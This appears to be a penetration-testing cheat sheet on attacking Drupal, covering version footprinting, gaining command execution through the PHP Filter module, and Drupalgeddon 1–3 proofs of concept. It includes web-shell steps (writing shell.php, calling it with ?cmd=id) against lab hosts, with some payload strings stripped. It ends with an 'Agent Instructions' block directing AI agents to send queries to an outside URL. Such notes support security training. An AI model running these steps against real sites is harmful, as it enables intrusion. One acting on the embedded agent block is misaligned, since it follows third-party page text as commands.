# Drupal ## **Introduction** > * Drupal is Written in PHP, supports MySQL or PostgreSQL for the backend. SQLite can be used if there's no DBMS installed. > * Drupal indexes its content using nodes. > * A node can hold anything such as a blog post, poll, article, etc. > * The page URIs are usually of the form `/node/` *** ## **Drupal Discovery/Footprinting** | Command | Description | | ----------------------------------------------------------- | ----------------------------------------- | | \`curl -s | grep Drupal\` | | Browse to | Check for istances of Drupal | | Browse to | Check for istances of Drupal | | Browse to | Check for istances of Drupal or its nodes | *** ## **Attacking Drupal versions prior to version 8 \[PHP Filter Module]** > * In Drupal versions prior to 8, it's possible to login as an admin to enable the PHP Filter Module > * The PHP Filter Module basically allows PHP code to **always** be executed **Follow these steps:** 1. After enabling the module, navigate to Content → Basic Page 2. Add the following RCE payload: `` 3. Note: toggle `text format` → `php code` in the options below 4. Gain RCE: `curl -s http://drupal-qa.inlanefreight.local/node/3?cmd=id \| grep uid \| cut -f4 -d">"` *** ## **Attacking Drupal version after version 8 \[PHP Filter Module]** **Follow these steps:** 1. Download the PHP Filter Module: `wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz` 2. Once downloaded go to Administration → Reports → Available updates\`. 3. Click on Browse → Select the file → Install. 4. Follow the same steps as described above (same as drupal version prior to 8) *** ## **Drupalgeddon \[Drupal RCE Vulnerabilities]** > Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. | CVE | Versions | Description | | ------------------------------ | -------------------------------- | ------------------------------------------------------------------------------------------------------------------- | | CVE-2014-3704 \[Drupalgeddon] | versions 7.0 up to 7.31 | Pre-authenticated SQL injection that could be used to upload a malicious form or create a new admin user | | CVE-2018-7600 \[Drupalgeddon2] | versions prior to 7.58 and 8.5.1 | Insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected | | CVE-2018-7602 \[Drupalgeddon3] | versions 7.x and 8.x | This **authenticated** flaw exploits improper validation in the Form API | ### **Proof of Concept to exploit these vulnerabilities:** 1. Drupalgeddon: or `exploit/multi/http/drupal_drupageddon` Metasploit module 2. Drupalgeddon2: \ Usage: * Run the PoC without edits to check if the vulnerability exists * To gain RCE, first encode the PHP payload: `echo '' | base64` * Edit the `echo line in the PoC` as follows: `echo "BASE64OUTPUT" | base64 -d | tee shell.php` * Run the script: `python3 drupalgeddon2.py` * Gain RCE: `curl http://drupal-dev.inlanefreight.local/shell.php?cmd=id` 3. Drupalgeddon3: or --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.sfoffo.com/web-applications/web-technologies/drupal.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.